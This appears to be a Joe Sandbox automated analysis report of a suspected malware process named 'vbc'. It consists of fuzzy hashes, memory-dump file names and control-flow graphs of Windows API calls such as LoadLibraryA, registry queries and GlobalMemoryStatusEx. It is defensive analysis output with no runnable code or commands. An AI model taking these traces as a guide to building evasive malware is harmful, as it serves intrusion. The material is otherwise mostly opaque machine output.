                                                                              • Opcode Fuzzy Hash: c8c050ba9438f24882e653dc6e594f72b668055a3170135bd2915e4bf3c6b8ca
                                                                              • Instruction Fuzzy Hash: D4615B30A102199BCB14DFB4D958BAEB7F2AF84305F118529E502EB394DBB99845CF91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8462261a3164a8efead6a13e4c58fabdcc15cdad6467b28438556627abcd25fa
                                                                              • Instruction ID: 63b286f6043cb35fb2d068ec5226e0a19bf693706ef5f30ff2a189d9860cda40
                                                                              • Opcode Fuzzy Hash: 8462261a3164a8efead6a13e4c58fabdcc15cdad6467b28438556627abcd25fa
                                                                              • Instruction Fuzzy Hash: DA420430F042449FCB04EBB8D854AAEBBB2EF86314F15816AD506DB392DB75DC49CB52
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2e3dc1fda5c0f951aac53b9a1cc0adaee9c840fef66cab5e0324ea0ffff31903
                                                                              • Instruction ID: 2fc9ac56aa4dd2d2011ccc4ee617483fb9c28f66ab87489661379e414e30f70a
                                                                              • Opcode Fuzzy Hash: 2e3dc1fda5c0f951aac53b9a1cc0adaee9c840fef66cab5e0324ea0ffff31903
                                                                              • Instruction Fuzzy Hash: 2E625A30A002148FCB14AFB4D998BADB7B6FF88310F1585A9D40ADB344DF79AD869F51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 70e02e9d630dad6e83a08636b034c4a9f5d1fcb319aabe33d3e878bbabc225af
                                                                              • Instruction ID: 1dc61a276ac7c96da6835b79bfe48522b0a207d5883219f05c64299276284ef4
                                                                              • Opcode Fuzzy Hash: 70e02e9d630dad6e83a08636b034c4a9f5d1fcb319aabe33d3e878bbabc225af
                                                                              • Instruction Fuzzy Hash: 3A129D30B002449FCB14DFB8D598AAEBBF2EF88304F15856AE415EB395DB74EC468B51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b28323d4767dc0ebaa35500acd0db0df713ea3b881fb921e1318cdb78716be04
                                                                              • Instruction ID: 6c83c9b0a5656b8ff8374b5f3b6b8ae16f35e1e0eee08bdf32200da7afe923bd
                                                                              • Opcode Fuzzy Hash: b28323d4767dc0ebaa35500acd0db0df713ea3b881fb921e1318cdb78716be04
                                                                              • Instruction Fuzzy Hash: B7B13B70E002499BDB10CFA9D8857DEBBF2FF88304F14822AD91AE7395DB749845DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a2df781d44adf9af8c2bf3f5640799c00bf4ef7c86e4871f94a08cfb8cbc7d3e
                                                                              • Instruction ID: 2a7ed27b949c1fb9829a1c988f2fbe7439b6022a0c022032a809aed47f759aa0
                                                                              • Opcode Fuzzy Hash: a2df781d44adf9af8c2bf3f5640799c00bf4ef7c86e4871f94a08cfb8cbc7d3e
                                                                              • Instruction Fuzzy Hash: 2FB15B70E002499FDB10CFA8D8857DEBBB2FF88308F14822AD91AE7355DB749845DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 81c8908f71334b24757acf1b878007036adf21287dafe2266e7cf0306255a591
                                                                              • Instruction ID: 7f563a133b4fe10433000091af282eff47e7fa5ebe19f31f9004e8979933b90d
                                                                              • Opcode Fuzzy Hash: 81c8908f71334b24757acf1b878007036adf21287dafe2266e7cf0306255a591
                                                                              • Instruction Fuzzy Hash: 43912970E00209DBDF14CFA9D98179DBBF2FB88308F14822AE50AE7355DB749846DB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 0A10D558
                                                                              • GetCurrentThread.KERNEL32 ref: 0A10D595
                                                                              • GetCurrentProcess.KERNEL32 ref: 0A10D5D2
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0A10D62B
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: c42ebb44b7847164055d0385d4bc30707dcf763b801a3e78f2b640d817d8a0d1
                                                                              • Instruction ID: dc717892340d1613ba2d4aeb26a1235542c3031d27ed0f451b96ae756d78d3e6
                                                                              • Opcode Fuzzy Hash: c42ebb44b7847164055d0385d4bc30707dcf763b801a3e78f2b640d817d8a0d1
                                                                              • Instruction Fuzzy Hash: F25144B09007888FDB14CFA9E548B9EBBF0EF48318F248459E419B7390D779A944CF65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 447 a1083a0-a1083ab 448 a1083d5-a1083f4 call a1069c8 447->448 449 a1083ad-a1083d4 call a103ea4 447->449 455 a1083f6-a1083f9 448->455 456 a1083fa-a108459 448->456 463 a10845b-a10845e 456->463 464 a10845f-a1084ec GlobalMemoryStatusEx 456->464 467 a1084f5-a10851d 464->467 468 a1084ee-a1084f4 464->468 468->467
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d883cf9d6c0b504a1c6fdfdf70243492a8f31de5f68b2848c4ec3d31054a515
                                                                              • Instruction ID: 07153afd5ee53e57f044d2bd6224dfd0262b2c3a3fbe975d15288204fc75d7cc
                                                                              • Opcode Fuzzy Hash: 1d883cf9d6c0b504a1c6fdfdf70243492a8f31de5f68b2848c4ec3d31054a515
                                                                              • Instruction Fuzzy Hash: E5412571E183998FCB14CFB9C4046AEBBF1EF89314F05816AD505E7291DBB89885CBD1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 471 8dc8e4-8dc947 473 8dc949-8dc953 471->473 474 8dc980-8dc9ca LoadLibraryA 471->474 473->474 475 8dc955-8dc957 473->475 479 8dc9cc-8dc9d2 474->479 480 8dc9d3-8dca04 474->480 477 8dc959-8dc963 475->477 478 8dc97a-8dc97d 475->478 481 8dc965 477->481 482 8dc967-8dc976 477->482 478->474 479->480 486 8dca14 480->486 487 8dca06-8dca0a 480->487 481->482 482->482 484 8dc978 482->484 484->478 489 8dca15 486->489 487->486 488 8dca0c 487->488 488->486 489->489
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(?), ref: 008DC9BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 39051bd81f4f7624f9b1c392874562e6a9992d568fedef1587497b60d42c86a5
                                                                              • Instruction ID: 86a6008d06e2bc991fcad87bbca52ff7c77709bbd90668c5bef2994434e00d7e
                                                                              • Opcode Fuzzy Hash: 39051bd81f4f7624f9b1c392874562e6a9992d568fedef1587497b60d42c86a5
                                                                              • Instruction Fuzzy Hash: 153133B0D1029A9FCB14CFA8C89579EBFB1FF08314F14822AE856E7380D7749846CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 490 8d9c5c-8dc947 492 8dc949-8dc953 490->492 493 8dc980-8dc9ca LoadLibraryA 490->493 492->493 494 8dc955-8dc957 492->494 498 8dc9cc-8dc9d2 493->498 499 8dc9d3-8dca04 493->499 496 8dc959-8dc963 494->496 497 8dc97a-8dc97d 494->497 500 8dc965 496->500 501 8dc967-8dc976 496->501 497->493 498->499 505 8dca14 499->505 506 8dca06-8dca0a 499->506 500->501 501->501 503 8dc978 501->503 503->497 508 8dca15 505->508 506->505 507 8dca0c 506->507 507->505 508->508
                                                                              APIs
                                                                              • LoadLibraryA.KERNELBASE(?), ref: 008DC9BA
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 1abd03dea282c69f6524a27c413e6374656291904343be018ca9356df8c4e8c0
                                                                              • Instruction ID: 67aeadfe7376f1b49b17cee8b865b19af85d2f3f120a4d5115ecaadf4907dd87
                                                                              • Opcode Fuzzy Hash: 1abd03dea282c69f6524a27c413e6374656291904343be018ca9356df8c4e8c0
                                                                              • Instruction Fuzzy Hash: 7D3102B0D1025AAFDB14CFA9C89579EBBB1FF48314F14822AE816E7380DB749845CF95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1201 a103ec0-a103f29 1203 a103f31-a103f3b 1201->1203 1204 a103f2b-a103f2e 1201->1204 1205 a103f47-a103f89 RegQueryValueExW 1203->1205 1206 a103f3d-a103f45 1203->1206 1204->1203 1207 a103f92-a103fcc 1205->1207 1208 a103f8b-a103f91 1205->1208 1206->1205 1212 a103fd6 1207->1212 1213 a103fce 1207->1213 1208->1207 1213->1212
                                                                              APIs
                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0A103F79
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 389bcb8bd60da9926fc4cf42b3fa0b15a74dbe0192c701b6d94f1c78af7c38b6
                                                                              • Instruction ID: a6e5bfcda62c81cd4a8dfc943b3295a056803fa630afa5e74d8710af5b83f317
                                                                              • Opcode Fuzzy Hash: 389bcb8bd60da9926fc4cf42b3fa0b15a74dbe0192c701b6d94f1c78af7c38b6
                                                                              • Instruction Fuzzy Hash: A731E1B1D106589FCB10CFA9C984ACEFBF5BF48310F55802AE829AB350D7749945CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1128 a102d50-a102d6f 1130 a102d71-a102d7b 1128->1130 1131 a102d94-a102dde 1128->1131 1132 a102d90-a102d93 1130->1132 1133 a102d7d-a102d8e 1130->1133 1138 a102de7-a102dfc LdrInitializeThunk 1131->1138 1133->1132 1139 a102e03-a102e0f 1138->1139 1140 a103010-a103023 1139->1140 1141 a102e15-a102e1e 1139->1141 1142 a10304a-a10304e 1140->1142 1143 a102e24-a102e39 1141->1143 1144 a103045 1141->1144 1145 a103050 1142->1145 1146 a103059 1142->1146 1148 a102e53-a102e6e 1143->1148 1149 a102e3b-a102e4e 1143->1149 1144->1142 1145->1146 1150 a10305a 1146->1150 1160 a102e70-a102e7a 1148->1160 1161 a102e7c 1148->1161 1151 a102fe4-a102fe8 1149->1151 1150->1150 1153 a102ff3-a102ffc 1151->1153 1154 a102fea 1151->1154 1157 a103040 1153->1157 1158 a102ffe-a10300a 1153->1158 1154->1153 1157->1144 1158->1140 1158->1141 1162 a102e81-a102e83 1160->1162 1161->1162 1163 a102e85-a102e98 1162->1163 1164 a102e9d-a102f36 1162->1164 1163->1151 1182 a102f44 1164->1182 1183 a102f38-a102f42 1164->1183 1184 a102f49-a102f4b 1182->1184 1183->1184 1185 a102f4d-a102f4f 1184->1185 1186 a102f8e-a102fe2 1184->1186 1187 a102f51-a102f5b 1185->1187 1188 a102f5d 1185->1188 1186->1151 1189 a102f62-a102f64 1187->1189 1188->1189 1189->1186 1191 a102f66-a102f8c 1189->1191 1191->1186
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 2a2e341e35c4a762f6a52b24bc733d576fabf29c93d63546f7f122e88eb53d32
                                                                              • Instruction ID: bb6a2749e57bd4db2abb40f220f9382b348476745226e03e59a68e2a7af97656
                                                                              • Opcode Fuzzy Hash: 2a2e341e35c4a762f6a52b24bc733d576fabf29c93d63546f7f122e88eb53d32
                                                                              • Instruction Fuzzy Hash: EB31BC30A013489FDB55DF78D849BEEBBB2EF85304F11846AD005EB2A5CB76984ACF41
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1214 a103808-a103858 1215 a103860-a1038cc RegOpenKeyExW 1214->1215 1216 a10385a-a10385d 1214->1216 1218 a1038d5-a10390d 1215->1218 1219 a1038ce-a1038d4 1215->1219 1216->1215 1223 a103920 1218->1223 1224 a10390f-a103918 1218->1224 1219->1218 1224->1223
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0A1038BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: 82ec04c419919c4fa9630e030d8ff4311435e554d691992b551799d3bc9689a9
                                                                              • Instruction ID: 81cd14dbeb50af544091ddf99ec0f298c59d91f56e4e0ac123a3d0739e671730
                                                                              • Opcode Fuzzy Hash: 82ec04c419919c4fa9630e030d8ff4311435e554d691992b551799d3bc9689a9
                                                                              • Instruction Fuzzy Hash: A231F2B0D002898FDB10CF99C584A8EFFF5BF48304F29816AE419AB344C7B59945CF94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1225 a10d19c-a10d7b4 DuplicateHandle 1227 a10d7b6-a10d7bc 1225->1227 1228 a10d7bd-a10d7da 1225->1228 1227->1228
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0A10D6E6,?,?,?,?,?), ref: 0A10D7A7
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: e2f3a2c3b5359f11b83b298f9e0fc3a587472d291e9c804f70bd9c5533e3f294
                                                                              • Instruction ID: 1728e5b95911a4802eb2cea8a6d3d1dfb6b6a0717bfded057ab67a54bc60f423
                                                                              • Opcode Fuzzy Hash: e2f3a2c3b5359f11b83b298f9e0fc3a587472d291e9c804f70bd9c5533e3f294
                                                                              • Instruction Fuzzy Hash: A12114B5900248EFCB10CFA9D584AEEBFF4EB48324F14801AE955B3350C378A954DFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1231 8d4cbb-8d4d0a 1234 8d4d0c-8d4d0e 1231->1234 1235 8d4d10 1231->1235 1236 8d4d15-8d4d20 1234->1236 1235->1236 1237 8d4d81-8d4d8e 1236->1237 1238 8d4d22-8d4d53 RtlEncodePointer 1236->1238 1240 8d4d5c-8d4d7c 1238->1240 1241 8d4d55-8d4d5b 1238->1241 1240->1237 1241->1240
                                                                              APIs
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 008D4D42
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: EncodePointer
                                                                              • String ID:
                                                                              • API String ID: 2118026453-0
                                                                              • Opcode ID: ed702f999146536727676735dec4b2534d4fc5f3c89ad67c1a726e00c9c9f37b
                                                                              • Instruction ID: a1299246de5c11df90c5aa2286663e4529830e11077f73d388a03660e27654c8
                                                                              • Opcode Fuzzy Hash: ed702f999146536727676735dec4b2534d4fc5f3c89ad67c1a726e00c9c9f37b
                                                                              • Instruction Fuzzy Hash: A22186B58007858FCB50DFAAD54939EBBF4FB45314F24812AD84AE7601C778984ACFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1243 a1069c8-a1084ec GlobalMemoryStatusEx 1246 a1084f5-a10851d 1243->1246 1247 a1084ee-a1084f4 1243->1247 1247->1246
                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A1083F2), ref: 0A1084DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID:
                                                                              • API String ID: 1890195054-0
                                                                              • Opcode ID: 4167c2dc5ac76028b404f1b436310c6e84ecd1278aab313a65659362fe8ae525
                                                                              • Instruction ID: e988b1e0b9ddaf02b45c124112f87d2ddad94e0a3b05d3ec8540ceb52d9b2edd
                                                                              • Opcode Fuzzy Hash: 4167c2dc5ac76028b404f1b436310c6e84ecd1278aab313a65659362fe8ae525
                                                                              • Instruction Fuzzy Hash: F31133B1C046599BCB10CFAAC544BDEFBF4AB48324F05816AD814B7240D378A944CFE5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1262 a108471-a1084b6 1263 a1084be-a1084ec GlobalMemoryStatusEx 1262->1263 1264 a1084f5-a10851d 1263->1264 1265 a1084ee-a1084f4 1263->1265 1265->1264
                                                                              APIs
                                                                              • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0A1083F2), ref: 0A1084DF
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: GlobalMemoryStatus
                                                                              • String ID:
                                                                              • API String ID: 1890195054-0
                                                                              • Opcode ID: 65f75ff794afea7d9ab830d5b76c20b4a53c6fd69c92526a9beefedd064b2e6d
                                                                              • Instruction ID: 55c2525a36e6a627e620e88cc75689f82916127deafd6a458fc415f316239c0b
                                                                              • Opcode Fuzzy Hash: 65f75ff794afea7d9ab830d5b76c20b4a53c6fd69c92526a9beefedd064b2e6d
                                                                              • Instruction Fuzzy Hash: 991133B1C0065A9FCB10CFA9D544BDEFBF4AF88324F15812AD814B3240D378A944CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1250 8d4cc8-8d4d0a 1253 8d4d0c-8d4d0e 1250->1253 1254 8d4d10 1250->1254 1255 8d4d15-8d4d20 1253->1255 1254->1255 1256 8d4d81-8d4d8e 1255->1256 1257 8d4d22-8d4d53 RtlEncodePointer 1255->1257 1259 8d4d5c-8d4d7c 1257->1259 1260 8d4d55-8d4d5b 1257->1260 1259->1256 1260->1259
                                                                              APIs
                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 008D4D42
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID: EncodePointer
                                                                              • String ID:
                                                                              • API String ID: 2118026453-0
                                                                              • Opcode ID: f73f7ea9a29c35fc9fc0ce19443fd9f5bbd4d7dc108d4e1055c4523359dd966c
                                                                              • Instruction ID: c08498be4fd63749d10b51c0e765ad040500a9eb047052d65b3a8701d7813f29
                                                                              • Opcode Fuzzy Hash: f73f7ea9a29c35fc9fc0ce19443fd9f5bbd4d7dc108d4e1055c4523359dd966c
                                                                              • Instruction Fuzzy Hash: E211BBB19007498FCB50EFAAD54979EBBF4FB48314F20802AD909E3700C778A849CFA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636218573.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_87d000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4ba0d7636b2312f82464158ced490cc24ae13ad9e1b089d4087086c7f0515280
                                                                              • Instruction ID: 5331bfee13c7976f5428a8f13f87584d0b25853b1538fbedc32608da626ac27c
                                                                              • Opcode Fuzzy Hash: 4ba0d7636b2312f82464158ced490cc24ae13ad9e1b089d4087086c7f0515280
                                                                              • Instruction Fuzzy Hash: 2252142165F7C09FE323A3388874AA5BF718E03129B1D48DFD4C5CE8A7D50A651AC7A7
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_86d000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31da694ed01aef63edb42f378c673d9f7ec921043cadd479d1bbef6d145761ab
                                                                              • Instruction ID: 09a0c0154b3862b371f857b6e6883d0beba5ade23e84cb5083b5a75d6b45bee8
                                                                              • Opcode Fuzzy Hash: 31da694ed01aef63edb42f378c673d9f7ec921043cadd479d1bbef6d145761ab
                                                                              • Instruction Fuzzy Hash: C2216AB1A04344DFCB00CF00D8C4F1ABF65FB88328F258569E9068B646C336DC45D7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_86d000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c6afd93516c9b28bdc7ce1497ccf2eff59c9bd7919d90f5dd0f176f75f9293ee
                                                                              • Instruction ID: e112d28fc6bbba545a286b0adbf5bd12b4b9d42ce0d022861bcb8f8b94925bf5
                                                                              • Opcode Fuzzy Hash: c6afd93516c9b28bdc7ce1497ccf2eff59c9bd7919d90f5dd0f176f75f9293ee
                                                                              • Instruction Fuzzy Hash: 58213AB1A04344DFDB00DF10D8C0B2ABF65FB98324F25C669E9098B246C736EC46D7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636218573.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_87d000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cee69563bb2b72af04509409650011237add7c3a26bd2bfd71eae2665e859a2f
                                                                              • Instruction ID: 71c5fd92693fafea292d4b691a5e7496256e41f88945876e14be8f69fa32edff
                                                                              • Opcode Fuzzy Hash: cee69563bb2b72af04509409650011237add7c3a26bd2bfd71eae2665e859a2f
                                                                              • Instruction Fuzzy Hash: B22149B1604644EFCB10CF10D8C4B26BB61FB88318F24C9A9D94D8B34AC33AD806DB65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_86d000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                              • Instruction ID: 0331508a333e0356718ec5bad5e901e300bbdaae51fd978f6f1d8f5052ae4616
                                                                              • Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                              • Instruction Fuzzy Hash: 4D11D376904384CFCB11CF10D5C4B16BF71FB98324F28C6A9D8064B656C33AD85ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636191984.000000000086D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0086D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_86d000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
                                                                              • Instruction ID: 216d585fa98f29c5b875dd20d994a815c848d07c5a25724d829cf12b4ea2b11a
                                                                              • Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
